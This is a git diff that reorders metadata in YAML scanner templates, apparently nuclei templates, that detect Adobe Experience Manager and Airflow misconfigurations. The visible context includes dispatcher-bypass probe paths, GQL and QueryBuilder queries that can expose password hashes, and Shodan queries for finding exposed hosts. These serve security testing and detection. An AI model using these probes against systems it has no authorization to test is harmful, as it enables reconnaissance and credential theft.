index 1eb07f1f72..c3003066df 100644
--- a/http/misconfiguration/aem/aem-custom-script.yaml
+++ b/http/misconfiguration/aem/aem-custom-script.yaml
@@ -6,17 +6,17 @@ info:
severity: unknown
reference:
- https://www.slideshare.net/0ang3el/hacking-aem-sites
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
+ vendor: adobe
+ product: experience_manager
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
tags: misconfig,aem,adobe
- classification:
- cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -52,4 +52,4 @@ http:
status:
- 200
-# digest: 4b0a0048304602210088f947984063983754727ab3147d3d8579e68e981678f9a1a2a8630c53890331022100834f575fe00ea170bceed8e15bc1afc6e964aff6dc8ecd912122809755b01dd0:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210088f947984063983754727ab3147d3d8579e68e981678f9a1a2a8630c53890331022100834f575fe00ea170bceed8e15bc1afc6e964aff6dc8ecd912122809755b01dd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-debugging-libraries.yaml b/http/misconfiguration/aem/aem-debugging-libraries.yaml
index 83da7380f8..3e3f7919d8 100644
--- a/http/misconfiguration/aem/aem-debugging-libraries.yaml
+++ b/http/misconfiguration/aem/aem-debugging-libraries.yaml
@@ -7,18 +7,18 @@ info:
reference:
- https://aem4beginner.blogspot.com/debugging-client-libraries
- https://adobe-consulting-services.github.io/acs-aem-tools/features/dumplibs/index.html
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,4 @@ http:
- 'Client Libraries Test Output '
condition: or
-# digest: 4a0a0047304502200a59b6529343037058eb327f347cbb63dcdc4c7bf942843169ea1b5166a64a430221008e7eb48bb676bbb20424b9e5ed8d12861728d6b2f532d23b2bed93d27ffec773:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200a59b6529343037058eb327f347cbb63dcdc4c7bf942843169ea1b5166a64a430221008e7eb48bb676bbb20424b9e5ed8d12861728d6b2f532d23b2bed93d27ffec773:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml
index 8c36f30959..ffb87f4cfa 100644
--- a/http/misconfiguration/aem/aem-default-get-servlet.yaml
+++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml
@@ -8,19 +8,20 @@ info:
reference:
- https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
- metadata:
- max-request: 64
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,adobe,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 64
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,adobe,misconfig
+
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
+
payloads:
paths:
- "/etc"
@@ -87,7 +88,6 @@ http:
- "///etc.children.json/FNZ.html"
- "///etc.children.json/FNZ.png"
- "///etc.children.json/FNZ.ico"
-
stop-at-first-match: true
matchers-condition: and
@@ -100,4 +100,5 @@ http:
words:
- 'jcr:createdBy'
condition: and
-# digest: 490a004630440220104eb07638891f6d6febb6bc9d9b53106368a2ce53208b54d3975a6489f1073e02202a4249f0550aa06ca7d459cc6a9798d7ed77e1d7d7bf98344f3abad59bfb7136:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220104eb07638891f6d6febb6bc9d9b53106368a2ce53208b54d3975a6489f1073e02202a4249f0550aa06ca7d459cc6a9798d7ed77e1d7d7bf98344f3abad59bfb7136:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml
index f723a98e03..63b473bb62 100644
--- a/http/misconfiguration/aem/aem-disk-usage.yaml
+++ b/http/misconfiguration/aem/aem-disk-usage.yaml
@@ -7,17 +7,17 @@ info:
description: Adobe AEM Disk Usage Information is exposed.
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 2
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe,exposure
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200555d5af56a7d2de9bf494904b6f84c28e8ca424ac008d59a06f50719835cf2002200be1973e4a0aa606b3ebec95d4d3bdc6da658c0655f494dfa8a323e9ee1a906b:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200555d5af56a7d2de9bf494904b6f84c28e8ca424ac008d59a06f50719835cf2002200be1973e4a0aa606b3ebec95d4d3bdc6da658c0655f494dfa8a323e9ee1a906b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-dump-contentnode.yaml b/http/misconfiguration/aem/aem-dump-contentnode.yaml
index d99d6019b3..dbc3b682b4 100644
--- a/http/misconfiguration/aem/aem-dump-contentnode.yaml
+++ b/http/misconfiguration/aem/aem-dump-contentnode.yaml
@@ -7,17 +7,17 @@ info:
description: Node Properties are exposed in AEM Dump.
reference:
- https://www.slideshare.net/0ang3el/hacking-aem-sites
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
metadata:
max-request: 2
+ vendor: adobe
+ product: experience_manager_cloud_service
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: experience_manager_cloud_service
- vendor: adobe
tags: misconfig,aem,adobe
- classification:
- cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -50,4 +50,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205d5bbe6ac19b50e900240a42f9d473d8905559b3f12249733d26aa4f7ab21f52022100d2ab3e983576ee3f9604a02809dd75ecfc1c6f7302a4148f74e422867f3b7f7c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205d5bbe6ac19b50e900240a42f9d473d8905559b3f12249733d26aa4f7ab21f52022100d2ab3e983576ee3f9604a02809dd75ecfc1c6f7302a4148f74e422867f3b7f7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml
index e3e9c7f466..3380c57adb 100644
--- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml
+++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml
@@ -7,17 +7,17 @@ info:
description: Adobe AEM Explorer NodeTypes is exposed.
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
metadata:
max-request: 1
+ vendor: adobe
+ product: experience_manager_cloud_service
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: experience_manager_cloud_service
- vendor: adobe
tags: misconfig,aem,adobe,exposure
- classification:
- cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210085e3be40289ff9dc95a53020c7f95e91deb14adb8d3dd368350d97076f0bf66702201e55b0378eb0d3c1cf7c0c38ceca8d15ad3ed8519322096d49105cc7c4b08002:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210085e3be40289ff9dc95a53020c7f95e91deb14adb8d3dd368350d97076f0bf66702201e55b0378eb0d3c1cf7c0c38ceca8d15ad3ed8519322096d49105cc7c4b08002:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml
index 2cb06f60b4..5db9739532 100644
--- a/http/misconfiguration/aem/aem-external-link-checker.yaml
+++ b/http/misconfiguration/aem/aem-external-link-checker.yaml
@@ -6,17 +6,17 @@ info:
severity: unknown
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 2
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe,exposure
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100e2bd723809b927a6801ac5b2583744d0ef36351561ccdb9128651aba345cc71f022100836c8d37a31041790cdec829f3de78fb60230d146378d19a8551015b18b04286:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e2bd723809b927a6801ac5b2583744d0ef36351561ccdb9128651aba345cc71f022100836c8d37a31041790cdec829f3de78fb60230d146378d19a8551015b18b04286:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml
index f50157572d..36465ae495 100644
--- a/http/misconfiguration/aem/aem-gql-servlet.yaml
+++ b/http/misconfiguration/aem/aem-gql-servlet.yaml
@@ -7,19 +7,20 @@ info:
description: AEM GQLServlet is exposed.
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
- metadata:
- max-request: 29
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 29
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
+
payloads:
paths:
- "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico"
@@ -51,7 +52,6 @@ http:
- "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix="
-
stop-at-first-match: true
matchers-condition: and
@@ -66,4 +66,5 @@ http:
- 'path'
- 'hits'
condition: and
-# digest: 490a0046304402206193866bf0dd434662189198c5055f732162d34385c7367eeb2ae0e01bfa7c280220313b031c5d09c5ee1b46c97a0f6030379d2964a722e2c6765a265e3232d6cd87:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206193866bf0dd434662189198c5055f732162d34385c7367eeb2ae0e01bfa7c280220313b031c5d09c5ee1b46c97a0f6030379d2964a722e2c6765a265e3232d6cd87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml
index f9563e0c1b..02b1ceb7bf 100644
--- a/http/misconfiguration/aem/aem-groovyconsole.yaml
+++ b/http/misconfiguration/aem/aem-groovyconsole.yaml
@@ -8,15 +8,15 @@ info:
reference:
- https://hackerone.com/reports/672243
- https://twitter.com/XHackerx007/status/1435139576314671105
- metadata:
- max-request: 2
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager_cloud_service
- vendor: adobe
- tags: aem,adobe,hackerone,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: adobe
+ product: experience_manager_cloud_service
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,adobe,hackerone,misconfig
+
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022043264a058b3f40cbb321ac1f9acaea06487cca638c087673eb48026c5fd0357c022100c4f8b8138448c20109589a47d17deb0ed23d8cd236ae29842aeb545dc53a9d07:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022043264a058b3f40cbb321ac1f9acaea06487cca638c087673eb48026c5fd0357c022100c4f8b8138448c20109589a47d17deb0ed23d8cd236ae29842aeb545dc53a9d07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml
index 4d86b0cde4..eb3ce0132e 100644
--- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml
+++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml
@@ -7,15 +7,15 @@ info:
description: AEM hased password can be queried via QueryBuilder Servlet.
reference:
- https://twitter.com/AEMSecurity/status/1372392101829349376
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: acs_aem_commons
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- raw:
- |
@@ -36,4 +36,5 @@ http:
- '"success":true'
- 'rep:password'
condition: and
-# digest: 4a0a00473045022100cb28ec85d528c4df5d807eecd666a91bd49b19e18ff697ba4d64930ae863334702202d6c99658248b15ba8e8c6ea8571dda1d95e41b9f6e4ea28bb30fdfad88520d7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100cb28ec85d528c4df5d807eecd666a91bd49b19e18ff697ba4d64930ae863334702202d6c99658248b15ba8e8c6ea8571dda1d95e41b9f6e4ea28bb30fdfad88520d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml
index 7ee77f1aaa..39c95e93fc 100644
--- a/http/misconfiguration/aem/aem-login-status.yaml
+++ b/http/misconfiguration/aem/aem-login-status.yaml
@@ -8,15 +8,15 @@ info:
reference:
- https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java
- metadata:
- max-request: 3
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,adobe,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 3
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,adobe,misconfig
+
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
words:
- 'CREDENTIAL_CHALLENGE'
-# digest: 4a0a0047304502203d588dfb867f6570608796de1e9e4fd6377b9423f492dcc6166121425133a35a022100a854db9f3c2f05923fb27a7ec79de8428a1164b62a07806c77b94f0ec83abf47:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203d588dfb867f6570608796de1e9e4fd6377b9423f492dcc6166121425133a35a022100a854db9f3c2f05923fb27a7ec79de8428a1164b62a07806c77b94f0ec83abf47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml
index ff7cde4e5a..efa0b0084a 100644
--- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml
+++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml
@@ -6,15 +6,15 @@ info:
severity: info
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
- 'assetPaths'
condition: and
-# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-offloading-browser.yaml b/http/misconfiguration/aem/aem-offloading-browser.yaml
index feed7799c9..cd86112bf0 100644
--- a/http/misconfiguration/aem/aem-offloading-browser.yaml
+++ b/http/misconfiguration/aem/aem-offloading-browser.yaml
@@ -7,17 +7,17 @@ info:
description: Adobe AEM Offloading Browser is exposed.
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 1
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ed6f741d37fa078e6e94ee682b0ae460d82c9020ba655b55652381d0726cbdfd022100857d459aacb53af935255af6cfd652e284b92f792b54557cab7c13f6ba0962bc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ed6f741d37fa078e6e94ee682b0ae460d82c9020ba655b55652381d0726cbdfd022100857d459aacb53af935255af6cfd652e284b92f792b54557cab7c13f6ba0962bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-osgi-bundles.yaml b/http/misconfiguration/aem/aem-osgi-bundles.yaml
index c5967a06b0..0bd3b538a4 100644
--- a/http/misconfiguration/aem/aem-osgi-bundles.yaml
+++ b/http/misconfiguration/aem/aem-osgi-bundles.yaml
@@ -7,17 +7,17 @@ info:
description: Adobe AEM Installed OSGI Bundles leaked.
reference:
- https://www.slideshare.net/0ang3el/hacking-aem-sites
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 1
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402204e2d865541ec98c031958ea17a246e62f591878eb7937454afc7613d6eea1b29022054b04763a304b494c9a7d0314f70dfe6aadbb9251da3b120c0390cc3b841ebf4:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402204e2d865541ec98c031958ea17a246e62f591878eb7937454afc7613d6eea1b29022054b04763a304b494c9a7d0314f70dfe6aadbb9251da3b120c0390cc3b841ebf4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
index be1a4d779a..8fb7238c7b 100644
--- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
+++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
@@ -7,15 +7,15 @@ info:
description: AEM QueryBuilder is vulnerable to LFI.
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
- metadata:
- max-request: 4
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 4
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- 'jcr:path'
- 'success'
condition: and
-# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml
index 7168c38401..23fbf88cf0 100644
--- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml
+++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml
@@ -8,15 +8,15 @@ info:
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java
- metadata:
- max-request: 8
- shodan-query: http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
- tags: aem,adobe,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 8
+ vendor: adobe
+ product: acs_aem_commons
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,adobe,misconfig
+
http:
- method: GET
path:
@@ -48,4 +48,4 @@ http:
- 'results'
condition: and
-# digest: 4a0a0047304502204622302d04c231f0e4e19c2e6650543f67b89b1a7180c14152a8a7cf2a5df1840221008db0ae31dbc522068081204274dd5abda67092d0569caf27d2385b8bb0ed7b62:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204622302d04c231f0e4e19c2e6650543f67b89b1a7180c14152a8a7cf2a5df1840221008db0ae31dbc522068081204274dd5abda67092d0569caf27d2385b8bb0ed7b62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml
index a0be433ec3..92134d13bd 100644
--- a/http/misconfiguration/aem/aem-sling-userinfo.yaml
+++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml
@@ -6,17 +6,17 @@ info:
severity: info
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
+ vendor: adobe
+ product: experience_manager
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
tags: misconfig,aem,adobe,exposure
- classification:
- cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502207b30d574d41fcb3e94ffe0212c94de9f2dc48edf9d9867a2461eeab786b7ef29022100c3a1aed74a1cb0fbd045174687716d20d66fe12ea1d307424fa3456a536fa587:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207b30d574d41fcb3e94ffe0212c94de9f2dc48edf9d9867a2461eeab786b7ef29022100c3a1aed74a1cb0fbd045174687716d20d66fe12ea1d307424fa3456a536fa587:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml
index 5b2f20e2b4..8187bcf9cd 100644
--- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml
+++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml
@@ -5,15 +5,15 @@ info:
author: DhiyaneshDk
severity: info
description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node."
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
part: header
words:
- 'application/json'
-# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml
index 0136ee583f..7acb858e58 100644
--- a/http/misconfiguration/airflow/airflow-debug.yaml
+++ b/http/misconfiguration/airflow/airflow-debug.yaml
@@ -5,16 +5,16 @@ info:
author: pdteam
severity: low
description: Airflow Debug Trace enabled.
+ classification:
+ cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Airflow - DAGs"
- product: airflow
vendor: apache
+ product: airflow
+ shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,fpd,misconfig
- classification:
- cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 500
-# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml
index de72e5617c..24cb711896 100644
--- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml
+++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDK
severity: high
description: Airflow Instance is exposed.
- metadata:
- max-request: 2
- shodan-query: title:"Airflow - DAGs"
- product: airflow
- vendor: apache
- tags: apache,airflow,unauth,misconfig
-
classification:
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: apache
+ product: airflow
+ shodan-query: title:"Airflow - DAGs"
+ tags: apache,airflow,unauth,misconfig
+
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203f67cdf6f889648d2b9868d0ae6fd9171a87f9ca6e81af9475bd589420897c0602204c41171087e3d9a6ec9545451f3c7f2323d355b529dabda81886328ec356efe3:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402203f67cdf6f889648d2b9868d0ae6fd9171a87f9ca6e81af9475bd589420897c0602204c41171087e3d9a6ec9545451f3c7f2323d355b529dabda81886328ec356efe3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml
